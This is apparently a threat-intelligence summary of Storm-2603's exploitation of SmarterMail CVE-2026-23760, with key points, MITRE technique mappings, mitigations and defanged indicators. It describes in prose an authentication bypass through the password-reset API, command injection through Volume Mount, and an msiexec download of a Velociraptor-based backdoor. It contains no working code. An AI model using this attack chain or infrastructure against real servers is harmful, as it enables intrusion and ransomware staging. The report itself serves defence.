ReliaQuest observed exploitation of SmarterTools SmarterMail (CVE-2026-23760) linked to the China-based actor “Storm-2603,” which abused the password reset API and the Volume Mount feature to achieve system execution and stage Warlock ransomware. Immediate mitigation steps include upgrading SmarterMail to Build 9511+, isolating mail servers, and restricting outbound traffic to prevent downloads and Velociraptor-based C2. #Warlock #Storm-2603
Keypoints
- ReliaQuest attributes active exploitation of CVE-2026-23760 to Storm-2603, which used the SmarterMail password reset API to overwrite administrator credentials and bypass authentication.
- The actor chained the auth bypass with SmarterMail’s Volume Mount feature to inject commands, gaining remote code execution on the Windows host.
- After RCE, attackers used msiexec to download an MSI (v4.msi) from Supabase and installed Velociraptor as a persistent C2/backdoor, blending with legitimate admin activity.
- Activity consistent with Warlock ransomware tradecraft was observed, though no ransomware binary was deployed during the investigated staging event.
- Parallel probes for CVE-2026-24423 (ConnectToHub API calls) originated from distinct infrastructure, indicating multiple actors or opportunistic scanning during the same window.
- Recommended defenses: upgrade SmarterMail to Build 9511+, segment/isolate mail servers, and enforce strict outbound firewall rules to block non-mail traffic and cloud-hosting destinations.
MITRE Techniques
- [T1190 ] Exploit Public-Facing Application – Used to gain initial access by exploiting SmarterMail CVE-2026-23760 and invoking the password reset API (‘allows the attacker to reset the administrator password through the password reset API.’)
- [T1098 ] Account Manipulation – Overwrote administrative credentials via the password reset workflow because the vulnerable versions accepted any input as proof of identity (‘the system accepts any value, even an incorrect entry, as valid proof of identity.’)
- [T1059 ] Command and Scripting Interpreter – Injected commands into the Volume Mount feature and observed MailService.exe spawning a shell to execute actions (‘MailService.exe spawning a command shell (cmd.exe) to execute the request.’)
- [T1218 ] Signed Binary Proxy Execution – Abused Windows Installer (msiexec) to execute an MSI payload, leveraging a signed system binary to run attacker-controlled code (‘abuse the Windows Installer (msiexec) to download a malicious payload (v4.msi) from Supabase’)
- [T1105 ] Ingress Tool Transfer – Transferred tooling/payloads from external hosting (Supabase) to the compromised host to stage persistence and C2 (‘download a malicious payload (v4.msi) from Supabase’)
- [T1071 ] Application Layer Protocol – Used Velociraptor, a legitimate forensics tool, configured for command-and-control to maintain access and blend with administrative traffic (‘The MSI file installs Velociraptor, which the attackers configure for command-and-control (C2).’)
Indicators of Compromise
- [Domain ] Hosting and delivery infrastructure – vdfccjpnedujhrzscjtq.supabase[.]co, auth.qgtxtebl.workers[.]dev
- [Domain ] Additional attacker-related domains – 2-api.mooo[.]com (observed in probing/activity)
- [IP Address ] Attacker infrastructure observed – 162.252.198[.]197, 199.217.99[.]93, and 3 more IPs (157.245.156[.]118, 45.127.35[.]186, 178.128.103[.]218)
- [File Name ] Payloads and tooling – v4.msi (malicious installer downloaded via msiexec), Velociraptor installer (installed and configured for C2)
- [Process Name ] Legitimate process abused to mask activity – MailService.exe (spawned cmd.exe), cmd.exe (command shell used to execute downloads/installers)